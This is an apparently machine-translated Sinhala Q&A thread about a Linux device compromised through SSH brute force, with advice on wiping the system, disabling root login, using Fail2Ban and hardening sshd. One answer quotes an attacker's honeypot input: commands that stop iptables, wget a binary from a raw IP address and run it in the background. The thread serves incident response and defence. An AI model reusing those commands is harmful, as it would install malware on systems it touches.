ඔබේ වෙබ් බ්‍රව්සරයට ප්‍රවේශ වීමට මිනිසුන්ට ඉඩ දීමට.

අන්තර්ජාලයට සාදරයෙන් පිළිගනිමු - ඕනෑම විවෘත එස්එස්එච් සේවාදායකයක් පිරික්සීමට, තිරිසන් ලෙස බල කිරීමට සහ විවිධ කෝපයන් ඇති කිරීමට ඉඩ ඇති තැන.

ආරම්භ කිරීමට, ඔබ නිෂ්පාදනයේ ගබඩාව සම්පූර්ණයෙන්ම අතුගා දැමිය යුතුය. ඔබට එය අධිකරණ වෛද්‍ය විද්‍යාව සඳහා යොමු කිරීමට අවශ්‍ය නම් එය රූපගත කරන්න, නමුත් එය මත ලිනක්ස් ස්ථාපනය දැන් සැක සහිතය.

අනුමාන වැඩ ටිකක් නමුත්

1. ඔබට තිරිසන් බල කිරීමක් හෝ පොදු මුරපදයක් භාවිතා කිරීම. එය අපැහැදිලි භාවයෙන් ආරක්ෂාව වන නමුත් ඔබට ශබ්ද කෝෂයේ මුරපදයක් හෝ SSH සඳහා විවෘත ගිණුමක් භාවිතා කිරීමට අවශ්‍ය නැත . විකල්පයක් නම් root SSH ප්‍රවේශය අක්‍රීය කරන්න හෝ අවම වශයෙන් නම වෙනස් කරන්න එවිට ඔවුන් දෙදෙනාම අනුමාන කළ යුතුය. SSHing root ලෙස කෙසේ හෝ භයානක ආරක්ෂක භාවිතයකි. ඔබ root භාවිතා කළ යුතු නම්, වෙනත් පරිශීලකයෙකු ලෙස ලොග් වී මාරු වීමට su හෝ sudo භාවිතා කරන්න.

2. නිෂ්පාදිතය මත පදනම්ව, ඔබට යම් ආකාරයකින් SSH ප්‍රවේශය අගුළු දැමීමට අවශ්‍ය විය හැකිය. සම්පුර්ණයෙන්ම අගුළු දැමීම හොඳ අදහසක් සේ පෙනෙන අතර පරිශීලකයන්ට අවශ්‍ය පරිදි එය විවෘත කිරීමට ඉඩ දෙයි . ඔබට ඉතිරි කළ හැකි සම්පත් මත පදනම්ව, සලකා බලන්න ඔබේම අනුජාලයක IP ලිපින වලට ඉඩ දීම හෝ යම් ආකාරයක පිවිසුම් තෙරපුම් පද්ධතියක්. අවසාන නිෂ්පාදනයේදී ඔබට එය අවශ්‍ය නොවන්නේ නම් එය අක්‍රිය කර ඇති බවට වග බලා ගන්න.

3. සම්මත නොවන වරායක් භාවිතා කරන්න. නැවත අපැහැදිලි වීමෙන් ආරක්ෂාව, නමුත් එයින් අදහස් කරන්නේ ප්‍රහාරකයාට ඔබේ වරාය ඉලක්ක කළ යුතු බවයි.

4. පෙරනිමි මුරපදයක් භාවිතා නොකරන්න. මා දුටු හොඳම ප්‍රවේශය නම් නිශ්චිත උපාංගයක් සඳහා අහඹු ලෙස මුරපදයක් ජනනය කර එය ඔබේ නිෂ්පාදනය සමඟ නැව්ගත කිරීමයි. හොඳම පුහුණුව යතුරු මත පදනම් වූ සත්‍යාපනයකි, නමුත් මහා වෙළඳපල නිෂ්පාදනයක් සඳහා ඔබ එය වෙත ළඟා වන්නේ කෙසේදැයි මම නොදනිමි.

ඔහ්, ඔබ අනිවාර්යයෙන්ම කපා කොටා ඇත. යමෙකුට මූල අක්තපත්‍ර ලබා ගැනීමට හැකි වූ අතර ඔබේ පද්ධතියට ට්‍රෝජන් බාගත කිරීමට උත්සාහ කළ බව පෙනේ. MariusMatutiae විසින් ගෙවීම් පිළිබඳ විශ්ලේෂණයක් සපයන ලදී.

ප්‍රශ්න දෙකක් පැන නගී: අ) ප්‍රහාරකයා සාර්ථක වූවාද? සහ ආ) ඔබට ඒ සඳහා කුමක් කළ හැකිද?

පළමු ප්රශ්නයට පිළිතුර විය හැක එය කිසිදු විය. පෙනෙන විදිහට සාර්ථක නොවී, පහර දෙන්නා බාගත කර ධාවනය කිරීමට උත්සාහ කරන ආකාරය සැලකිල්ලට ගන්න. යම් දෙයක් (SELinux, perchance?) ඔහුගේ මාර්ගයට පැමිණ ඇතැයි මම සැක කරමි.

කෙසේ වෙතත්: /etc/rc.d/rc.localඔබේ පද්ධතිය නැවත ආරම්භ කරන විට, ගෙවීම් සක්‍රීය වනු ඇතැයි යන බලාපොරොත්තුවෙන් ප්‍රහාරකයා ඔබේ ගොනුවද වෙනස් කළේය. ඔබ තවමත් පද්ධතිය නැවත ආරම්භ කර නොමැති නම්, ඔබ මෙම වෙනස් කිරීම් ඉවත් කරන තුරු නැවත ආරම්භ නොකරන්න /etc/rc.d/rc.local. ඔබ දැනටමත් එය නැවත ආරම්භ කර ඇත්නම් ... හොඳයි, දැඩි වාසනාව.

ඔබට ඒ පිළිබඳව කළ හැකි දේ සම්බන්ධයෙන්: කළ හැකි ආරක්ෂිතම දෙය වන්නේ පද්ධතිය අතුගා දැමීම සහ මුල සිටම නැවත ස්ථාපනය කිරීමයි. නමුත් මෙය සැමවිටම විකල්පයක් නොවිය හැකිය. සැලකිය යුතු ලෙස අඩු ආරක්ෂිත දෙයක් නම්, සිදුවූ දේ හරියටම විශ්ලේෂණය කර ඔබට හැකි නම් එහි සෑම හෝඩුවාවක්ම පිස දැමීමයි. නැවතත්, ඔබ තවමත් පද්ධතිය නැවත ආරම්භ කර නොමැති නම්, සමහර විට ඒ සඳහා අවශ්‍ය වන්නේ පිරිසිදුයි /etc/rc.d/rc.local, ප්‍රහාරකයා විසින් බාගත කළ ඕනෑම දෙයක් ඉවත් කරන්න, අවසාන වශයෙන් නොව අවම වශයෙන් මුරපදය වෙනස් කරන්න!

කෙසේ වෙතත්, ප්‍රහාරකයාට දැනටමත් ගෙවීම් භාරය ධාවනය කිරීමට හැකි වූයේ නම්, ඔබේ පද්ධතියේ වෙනත් වෙනස් කිරීම් තිබිය හැකි අතර එය හඳුනා ගැනීමට අපහසු විය හැකිය. සම්පූර්ණ පිසදැමීම සැබවින්ම එකම ආරක්ෂිත (සහ නිර්දේශිත) විකල්පය වන්නේ එබැවිනි. ඔබ පෙන්වා දුන් පරිදි, සැක සහිත උපකරණ පරීක්ෂණ / සංවර්ධන ඉලක්කයක් විය හැකි බැවින් එය අතුගා දැමීම වෙනත් අවස්ථාවල දී මෙන් වේදනාකාරී නොවේ.

යාවත්කාලීන කිරීම : හැකි ප්‍රකෘතියක් ගැන මා ලියා ඇති දේ නොතකා, මෙම ගෙවීම් නිසා සිදුවිය හැකි හානිය සහ එය ඉලක්කගත පද්ධතියට කොතරම් දුරට බාධා ඇති කර ඇත්දැයි අවතක්සේරු නොකිරීමට මාරියස්මාටූටියාගේ දැඩි නිර්දේශය ප්‍රතිරාවය කිරීමට මම කැමැත්තෙමි .

මගේ sshd -oneypot ද මේ ආකාරයේ ප්‍රහාරයක් දැක ඇත. එම URL වෙතින් පළමු බාගැනීම් 2016-01-29 10:25:33 ආරම්භ වූ අතර ප්‍රහාර තවමත් සිදුවෙමින් පවතී. පහරදීම් / පැමිණෙමින් තිබුනි

103.30.4.212
111.68.6.170
118.193.228.169

මෙම ප්‍රහාරකයන්ගේ ආදානය වූයේ:

සේවා iptables නතර වේ
wget http://222.186.30.209:65534/yjz1
nohup / root / yjz1> / dev / null 2> & 1 &
chmod 0777 yjz1
chmod u + x yjz1
./yjz1 සහ
chmod u + x yjz1
./yjz1 සහ
cd / tmp

එබැවින් පසුකාලීනව පසුපස දොර ස්ථාපනය කිරීම හැර වෙනත් ක්‍රියාකාරකම් නොමැත.

මෙහි සිටින සෑම කෙනෙකුම ස්ථිර උපදෙස් ලබා දී ඇත, නමුත් පැහැදිලිව කිවහොත්, ඔබේ ප්‍රමුඛතා විය යුත්තේ එම පද්ධතියෙන් ඔබට සැබවින්ම අවශ්‍ය දේ සත්‍යාපනය කර සත්‍යාපනය කළ යුතු අතර පසුව එය දන්නා ආරක්ෂිත මාධ්‍යයෙන් නව ස්ථාපනයකින් පිස දැමීමයි.

ඔබගේ අලුතින් ස්ථාපනය කර ඇති ධාරකය අන්තර්ජාලයට සම්බන්ධ කිරීමට පෙර, මෙම අදහස් හරහා ධාවනය කරන්න:

1. නව මූල නොවන පරිශීලකයෙකු සාදන්න, එම පරිශීලකයා ලෙස ලොග් වන්න. ඔබට කිසි විටෙකත් root ලෙස පුරනය වීමට අවශ්‍ය නොවිය යුතුය, අවශ්‍ය විටදී sudo (ආදේශක පරිශීලක කරන්න).

2. අනිවාර්ය ප්‍රවේශ ප්‍රවේශය පාලනය කළ හැකි SE ලිනක්ස්, වින්‍යාස සැකසුම් ස්ථාපනය කරන්න: https://wiki.debian.org/SELinux/Setup

3. ඔබගේ කාර්යාලය / නිවස සහ අන්තර්ජාලය අතර දෘඩාංග ෆයර්වෝලයක් සලකා බලන්න. මම විශිෂ්ට ප්‍රජා සහයෝගයක් ඇති මයික්‍රෝටික් භාවිතා කරමි: http://routerboard.com/ .

ඔබගේ ගෙවන ලද වැඩ නිම කිරීම සඳහා ඔබ කාලරාමුවක සිටින බව උපකල්පනය කරමින්, අවම වශයෙන් # 1 කරන්න. # 3 වේගවත් හා ලාභදායී නමුත් ඔබට එක්කෝ තැපෑලෙහි ඇති පැකේජය මත රැඳී සිටීමට අවශ්‍ය වේ, නැතහොත් ගබඩාවට ධාවනය කරන්න.

1. ය , ඩේබියන්-armhf ඔබගේ සත්කාරය නම? නැතහොත් පෙරනිමි සැකසුම් සමඟ පෙරනිමි ස්ථාපනය භාවිතා කරනවාද? එහි කිසිදු ගැටළුවක් නොමැත, නමුත් ඔබ ධාරකයට කෙලින්ම අන්තර්ජාලයට නිරාවරණය වීමට ඉඩ නොදිය යුතුය (එනම් අවම වශයෙන් ඔබේ මොඩමයෙන් ආරක්ෂා නොවේ).

2. 222.186.30.209 සිට සැබෑ කරදර පැමිණෙන බව පෙනේ ( http://anti-hacker-alliance.com/index.php?ip=222.186.30.209 බලන්න ). මයික්‍රොසොෆ්ට් අයිපී දැකීමට ඔබ වැඩි අවධානයක් යොමු නොකළ යුතුය. අයිපී පහසුවෙන් හෝ අඩු වශයෙන් ව්‍යාජ / වංචා කළ හැකිය.

3. අන්තර්ජාලයට සම්බන්ධ වීමට සුපුරුදු ක්‍රමයක් නම්, ඔබේ පොදු අයිපී (උදා. 8.8.8.8) වෙතින් දන්නා වරාය ලැයිස්තුවක් ඔබේ දේශීය (උදා. 192.168.1.12) වෙත යොමු කිරීමයි.

   • උදාහරණයක් ලෙස, පැමිණෙන සියලුම සම්බන්ධතා 8.8.8.8 (පොදු) සිට 192.168.1.12 (දේශීය) වෙත යොමු නොකරන්න .

   • ඉදිරියට ගෙනයන්න වරාය 22 සහ 25 පමණි (පිළිවෙලින් ssh සහ පැමිණෙන තැපැල්). ඇත්ත වශයෙන්ම, ඔබට යාවත්කාලීන ssh සහ smtp පැකේජ / පුස්තකාල ද තිබිය යුතුය.

4. ඊළඟ කුමක්ද? ධාරකය විසන්ධි කරන්න, සහ ෂෙල් ස්ක්‍රිප්ට් වල දෘ c කේත කර ඇති මුරපද (සංවිධානය හා සම්බන්ධ ඕනෑම පරිගණකයක) වෙනස් කරන්න (ඔබට ලැජ්ජයි!) /etc/shadow.

අනෙක් අය ප්‍රකාශ කළ පරිදි, ඔබේ සේවාදායකයේ ආරක්ෂාව අඩාල වී ඇති බව පැහැදිලිය. ආරක්ෂිතම දෙය නම් මෙම යන්ත්‍රය පිස දමා නැවත ස්ථාපනය කිරීමයි.

ඔබගේ ප්‍රශ්නයේ දෙවන කොටසට පිළිතුරු සැපයීම සඳහා, ඔබට පොදු යතුරු සත්‍යාපනය භාවිතා කළ නොහැකි නම්, අවම වශයෙන් Fail2Ban සැකසීමට සහ සම්මත නොවන වරායක SSH ධාවනය කිරීමට මම නිර්දේශ කරමි. මම root SSH ප්‍රවේශයද අක්‍රීය කරමි.

නිශ්චිත වාර ගණනක් පුරනය වීමට අපොහොසත් වන IP ලිපින තහනම් කිරීමෙන් තිරිසන් බල ප්‍රහාර අවම කිරීමට Fail2Ban උපකාරී වේ.

සම්මත නොවන වරායක සවන්දීමට sshd සැකසීම අවම වශයෙන් ඔබේ SSH සේවාදායකයේ දෘශ්‍යතාව සුළු වශයෙන් අඩු කිරීමට උපකාරී වේ. මූල ලොගනය අක්‍රීය කිරීමෙන් ප්‍රහාරක පැතිකඩ තරමක් අඩු කරයි. තුළ /etc/sshd_config:

PermitRootLogin no
Port xxxxx

මූල පිවිසුම් අක්‍රීය කර ඇති suවිට, ඔබ සම්බන්ධ වූ පසු root වෙත මාරු වීමට අවශ්‍ය වනු ඇත , නැතහොත් (වඩාත් සුදුසු) sudoවරප්‍රසාදිත විධාන ක්‍රියාත්මක කිරීමට භාවිතා කරන්න.

SSH සේවාදායකයන් නිරන්තරයෙන් අන්තර්ජාලයට පහර දෙනු ලැබේ. ඔබ කරන දේවල් කිහිපයක්:

1. අන්තර්ජාලයට පිවිසිය හැකි යන්ත්‍ර සඳහා ඔබ ඉතා ආරක්ෂිත අහඹු මුරපදයක් භාවිතා කරන බවට වග බලා ගන්න. මම අදහස් කළේ අක්ෂර 16 ක් හෝ ඊට වැඩි හා සම්පූර්ණයෙන්ම අහඹු ලෙස ය. මුරපද කළමණාකරුවෙකු භාවිතා කරන්න එවිට ඔබට එය කටපාඩම් කිරීමට අවශ්‍ය නොවේ. ඔබගේ මුරපදය කටපාඩම් කර ගත හැකි නම්, එය ඉතා සරල ය.

2. ඔබට SSH අවශ්‍ය නොවේ නම්, එය ක්‍රියා විරහිත කරන්න. ඔබට එය අවශ්‍ය නම්, නමුත් එය ප්‍රසිද්ධියේ ප්‍රවේශ විය යුතු නොවේ නම්, එය උසස්, සම්මත නොවන වරාය අංකයකින් ධාවනය කරන්න. මෙය කිරීමෙන් හැක් කිරීමේ උත්සාහයන් නාටකාකාර ලෙස අඩු වේ. ඔව්, කැපවූ හැකර්වරයෙකුට වරාය ස්කෑන් කිරීමක් කළ හැකි නමුත් ස්වයංක්‍රීය බොට්ස් එය සොයා නොගනී.

ඔබගේ සත්‍යාපන ලොගයේ ස්නිපටය අසාර්ථක උත්සාහයක් පෙන්වයි. කෙසේ වෙතත් ඔබ තවදුරටත් බැලුවහොත් ඔබට සාර්ථක පිවිසුමක් පෙනෙනු ඇත. එය ඔබ සරල මුරපදයක් භාවිතා කරයි, එවිට බෝට්ටුවකට ඇතුළුවීම සුළුපටු ය.

ඔබට මෙම යන්ත්‍රය ජාලයෙන් හුදකලා කිරීමට අවශ්‍යයි. ඔබට අවශ්‍ය දේ ඉතා පරිස්සමින් ලබාගෙන එය පිස දමන්න.

ඉදිරිපස ලිනක්ස් / යුනික්ස් සේවාදායකයක් සැකසීමෙන් පසු ඕනෑම අයෙකු / සියලු දෙනා කළ යුතු පළමු දෙය වන්නේ වහාම අක්‍රීය rootකිරීමයි.

ඔබේ පද්ධතිය සම්මුතියකට ලක් විය. ඔබ සතුව ධාවන ඉතිහාස සටහනක් ඇත, එය යම් දුරකට බැලීමට සිසිල් විය හැකිය. නමුත් විශේෂිත කරුණු අවංකව වි ect ටනය කිරීම තරමක් අච්චාරු වන අතර එය ඔබේ සේවාදායකය සුරක්ෂිත කිරීමට උපකාරී නොවේ. බොට්නෙට් විසින් අනිෂ්ට මෘදුකාංග නිපදවූ විට සිදු වන සියලු ආකාරයේ විකාරයන් එය පෙන්වයි - එය බොහෝ විට ඔබේ සේවාදායකයට ආසාදනය වූ ලිනක්ස් පද්ධතියකට ආසාදනය වේ. මෙම @MariusMatutiae විසින් සපයන පිළිතුර හොඳයි හා හොඳින් සිතා ඔබ හරහා කපා කොටා ඝාතනය කරන නැවත අය ඉන්නවනේ rootවූ අනිෂ්ට මෘදුකාංග / botnet ගේ තෙත් සිහිනය වන ප්රවේශය.

අක්‍රීය කරන්නේ කෙසේද යන්න පිළිබඳ පැහැදිලි කිරීම් කිහිපයක් ඇත, rootනමුත් මම පෞද්ගලික අත්දැකීම් වලින් ප්‍රකාශ කරමි, මම දැන් විස්තර කරන දෙයින් ඔබ්බට ගිය ඕනෑම දෙයක් අතිරික්තය. මෙය ඔබ කුමක් කළ යුතු , කීබෝඩ් විට ඔබ විසින් සේවාදායකය සිදු කර ඇත:

1. සමග නව පරිශීලක නිර්මාණය sudoඅයිතීන්: වගේ නව නමක්-යමක් සමග නව පරිශීලක නිර්මාණය cooldudeමෙවැනි විධානයක් -using sudo adduser cooldudeඔබට උබුන්ටු හෝ Debian පද්ධතිය තවත් වර්ගය භාවිතා කරන්නේ නම්. sudoමෙවැනි විධානයක් භාවිතා කර ගොනුව අතින් සංස්කරණය කර කියවිය යුතු සමාන රේඛාවට යටින් sudo nano /etc/sudoersපේළියක් එක් කරන්න . එය සිදු කිරීමෙන්, අයිතිවාසිකම් ක්‍රියාත්මක වේදැයි බැලීමට මූලික හා විනාශකාරී නොවන වැනි විධානයක් සමඟ විධානය පරීක්ෂා කර පරීක්ෂා කරන්න . මුරපදයක් ඔබෙන් විමසනු ඇත. එය ක්‍රියාත්මක වේද? සියල්ල හොඳයි! ඊළඟ පියවරට යන්න.cooldude ALL=(ALL:ALL) ALLroot ALL=(ALL:ALL) ALLcooldudesudosudo wsudo
2. ලොක් root: ගිණුමක් හරි, දැන් cooldudeසමග භාර sudoලෙස අයිතීන්, පිවිසුම් cooldudeසහ root ගිණුම අගුලු දැමීමට මෙම විධානය ක්රියාත්මක sudo passwd -l root. කෙසේ හෝ ඔබ සඳහා SSH යතුරු යුගලයක් නිර්මාණය කර ඇත්නම් root, විවෘත කර /root/.ssh/authorized_keysයතුරු ඉවත් කරන්න. නැතහොත් වඩා හොඳ, SSH යතුරු effectively ලදායී ලෙස අක්‍රිය කිරීම සඳහා එම ගොනුව authorized_keys_OFFමේ ආකාරයට නම් කරන්න sudo mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_OFF. මම පසුව කැමති වන්නේ ඔබට තවමත් මුරපදය අඩු පිවිසුමක් අවශ්‍ය නිසා, ඔබට එම ගොනුව මුල් නමට ගෙන යා හැකි අතර ඔබ යාමට හොඳ විය යුතුය.

FWIW, මම වසර ගණනාවක් (දශක ගණනක්) ලිනක්ස් සේවාදායකයන් දුසිම් ගණනක් කළමනාකරණය කර ඇති අතර අත්දැකීම් වලින් දනිමි root- අක්‍රීය කිරීම සහ sudoඅයිතිවාසිකම් සහිත නව පරිශීලකයෙකු පිහිටුවීම any ඕනෑම ලිනක්ස් පද්ධතියක් සුරක්ෂිත කිරීම සඳහා සරලම හා මූලිකම ක්‍රමයයි. වරක් rootඅක්‍රීය වූ විට මට කිසි විටෙකත් SSH හරහා කිසිදු ආකාරයක සම්මුතියක් සමඟ කටයුතු කිරීමට සිදු නොවීය . ඔව්, ඔබට පිවිසීමට උත්සාහ කිරීම දැකිය හැකි auth.logනමුත් ඒවා අර්ථ විරහිත ය; rootඅක්‍රීය කර ඇත්නම්, එම උත්සාහයන් කිසි විටෙකත් කිසිවක් එකතු නොකරයි. නැවත වාඩි වී උත්සාහයන් නිමක් නැතිව බලා සිටින්න!